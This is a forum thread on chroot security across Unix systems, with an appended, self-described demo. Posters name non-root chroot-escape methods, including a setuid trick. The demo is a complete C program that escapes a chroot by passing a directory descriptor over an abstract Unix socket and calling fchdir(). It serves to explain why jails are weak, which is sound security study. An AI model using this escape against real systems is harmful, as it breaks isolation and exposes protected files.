
comparison over systems

Posted: Mon Apr 07, 2003 4:59 pm
by blackmage
Little comments about the compare page.

The main ones are about chroot: in terms of security, chroot seems useless to me if you use it as root (speaking of the user in the chroot).
The regression tests only chroot and then run their test code. For example, on OpenBSD, all chroots (default httpd, named) are used as a common user (setuid/setgid), so most of the tests will be successful, I think, if the uid is changed (test both?).

About dmesg, I believe it to be mainly a permissions problem (BSD: /dev/kmem, /var/log/dmesg.boot, the dmesg binary).

Otherwise, no more comments. Yours?

Posted: Mon Apr 07, 2003 5:54 pm
by spender
Three of the regression tests on there can be launched as non-root to break the chroot, and they will happily run on the other OSes.

-Brad

Posted: Mon Apr 07, 2003 6:38 pm
by spender
To clarify, three of the tests can be used regardless of the quality of the code within the chroot. At least 2 other attacks can be launched if the chrooted application isn't written correctly.

-Brad

Posted: Tue Apr 08, 2003 3:46 am
by blackmage
I've tested the chroot_chroot test on OpenBSD by adding a ret = setuid(-1); before the test and it passed.

To which test do you refer?
If I remember well, chroot and mknod need root access. For the others, I'm not sure.

In any case, any poorly written app is insecure; we're trying to speak of the good ones (I hope :D).

Posted: Tue Apr 08, 2003 8:55 am
by spender
Of course it passed when you did the setuid. Only root is allowed to chroot. I've explained above which tests can be launched as non-root. I've worked on this stuff for over 2 years now, so I know what I'm doing. In fact, I've written a paper on breaking chroot, however I cannot publish it myself (it is intended for a magazine).

BTW: do you see any irony in your last statement? If all your apps are secure, there is no need for chroot, now is there? ;)

-Brad

Posted: Tue Apr 08, 2003 10:48 am
by blackmage
Sorry, maybe I need to clean my glasses or I'm too tired, but I don't see where you mention which three tests can be used as non-root. (I know that mknod/chroot are root-restricted.)
I'm not saying grsecurity is bad; I use it myself and find it great, but I'm discussing some comparison points.

In which magazine do you plan to publish? Will it be available on the net?

It depends: my last sentence was about good apps (a "really" secure app is something rare today) like apache/bind9/etc. (not secure, but not insecure either).

Posted: Tue Apr 08, 2003 10:51 am
by spender
ptrace, semaphores, shared memory, message queues, and abstract unix domain sockets can all be used as non-root. fchdir() can be used as non-root if the application is written incorrectly.

The article is for a French Linux magazine.

-Brad
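
Added example (not from the thread and not grsecurity's regression-test code): how the abstract unix domain socket and fchdir() items on Brad's list combine into an escape that needs no privilege inside the jail. The attacker's ordinary shell outside the jail listens on a Linux abstract-namespace socket; the attacker's code inside the chrooted service connects to it (the name is not a filesystem path, so the chroot does not hide it), receives a directory descriptor via SCM_RIGHTS, and fchdir()s to it, after which relative paths reach the real filesystem. Only the demo's own chroot() call needs root; as an ordinary user the same exchange runs against the real root. The function names, the socket name grsec-demo, the jail path /tmp/grsec-jail and the choice of handing over "/" are my own assumptions for the demo.

```c
#define _GNU_SOURCE                     /* chroot() on glibc */
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <unistd.h>
int chroot(const char *path);           /* prototype in case a strict -std hides it */
/* Aligned control buffer for one SCM_RIGHTS message carrying one fd. */
union fdcmsg { struct cmsghdr hdr; char buf[CMSG_SPACE(sizeof(int))]; };

/* Linux abstract-namespace address: the leading NUL byte puts the name in a
 * kernel namespace, not on the filesystem, so a chroot cannot hide it. */
static socklen_t abstract_addr(struct sockaddr_un *sa, const char *name)
{
    size_t n = strlen(name);
    if (n > sizeof sa->sun_path - 1)
        n = sizeof sa->sun_path - 1;
    memset(sa, 0, sizeof *sa);
    sa->sun_family = AF_UNIX;
    memcpy(sa->sun_path + 1, name, n);      /* sun_path[0] stays '\0' */
    return (socklen_t)(sizeof sa->sun_family + 1 + n);
}

/* Move one descriptor over a connected Unix socket with SCM_RIGHTS.
 * fd >= 0: send it, return 0 or -1.  fd < 0: receive, return the fd or -1. */
static int pass_fd(int sock, int fd)
{
    char byte = 'F';
    struct iovec iov = { &byte, 1 };
    union fdcmsg u;
    struct msghdr msg;
    memset(&msg, 0, sizeof msg);
    memset(&u, 0, sizeof u);
    msg.msg_iov = &iov;         msg.msg_iovlen = 1;
    msg.msg_control = u.buf;    msg.msg_controllen = sizeof u.buf;
    if (fd >= 0) {
        u.hdr.cmsg_level = SOL_SOCKET;
        u.hdr.cmsg_type = SCM_RIGHTS;
        u.hdr.cmsg_len = CMSG_LEN(sizeof fd);
        memcpy(CMSG_DATA(&u.hdr), &fd, sizeof fd);
        return sendmsg(sock, &msg, 0) == 1 ? 0 : -1;
    }
    if (recvmsg(sock, &msg, 0) != 1)
        return -1;
    if (CMSG_FIRSTHDR(&msg) && u.hdr.cmsg_level == SOL_SOCKET && u.hdr.cmsg_type == SCM_RIGHTS)
        memcpy(&fd, CMSG_DATA(&u.hdr), sizeof fd);
    return fd;
}

/* Parent = the attacker's ordinary shell outside the jail; child = attacker
 * code inside the jailed service. With jail_it set (needs root) the child
 * really chroot()s into an empty directory first. Returns 1 if the child
 * ends up reading etc/passwd on the real filesystem, else 0. */
int run_escape_demo(const char *name, const char *outside_dir, int jail_it)
{
    struct sockaddr_un sa;
    socklen_t len = abstract_addr(&sa, name);
    int ls = socket(AF_UNIX, SOCK_STREAM, 0), status = -1;
    pid_t pid;
    if (ls < 0 || bind(ls, (struct sockaddr *)&sa, len) != 0 || listen(ls, 1) != 0)
        return 0;
    pid = fork();
    if (pid == 0) {
        int cs = socket(AF_UNIX, SOCK_STREAM, 0), dirfd;
        close(ls);
        if (jail_it) mkdir("/tmp/grsec-jail", 0700);   /* empty dir to jail into */
        if (jail_it && (chroot("/tmp/grsec-jail") != 0 || chdir("/") != 0))
            _exit(2);
        /* In the jail "/" is an empty directory, yet the abstract name still resolves. */
        if (cs < 0 || connect(cs, (struct sockaddr *)&sa, len) != 0)
            _exit(3);
        dirfd = pass_fd(cs, -1);
        /* fchdir() moves the cwd outside the jail, so relative paths reach the real fs.
         * Any outside directory works (".." resolves against the cwd, not the process root). */
        if (dirfd < 0 || fchdir(dirfd) != 0)
            _exit(4);
        _exit(access("etc/passwd", R_OK) == 0 ? 0 : 5);
    }
    if (pid > 0) {
        int cs = accept(ls, NULL, NULL);    /* blocks until the jailed side connects */
        int dirfd = open(outside_dir, O_RDONLY);
        if (cs >= 0 && dirfd >= 0)
            pass_fd(cs, dirfd);
        if (cs >= 0) close(cs);
        if (dirfd >= 0) close(dirfd);
        waitpid(pid, &status, 0);
    }
    close(ls);
    return pid > 0 && WIFEXITED(status) && WEXITSTATUS(status) == 0;
}

int main(void)
{
    int jailed = geteuid() == 0;            /* chroot() itself needs root */
    printf("escape %s a real chroot: %s\n", jailed ? "from" : "without",
           run_escape_demo("grsec-demo", "/", jailed) ? "succeeded" : "failed");
    return 0;
}
```

Run it as root to see the chroot() actually applied and still escaped; as an ordinary user it runs the same exchange against the real root, which is the point: nothing in the escape itself needs privilege, and dropping the service to a non-root uid (the OpenBSD setup blackmage describes) does not stop it. The abstract socket namespace is Linux-specific, so on OpenBSD the accomplice outside the jail would need another channel to hand the descriptor in; the fchdir() half is the same on any Unix.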

Posted: Tue Apr 08, 2003 10:59 am
by spender
In addition, if the attacker has an account on the system by other methods, chmod +s is an easy way to get access to the chrooted UID/GID outside of the chroot.

-Brad

Posted: Fri Apr 11, 2003 3:02 am
by blackmage
OK, thanks a lot, I will take a look.

Also, one thing I forgot is the FreeBSD jail (which, as an improved chroot, could be more successful in the tests).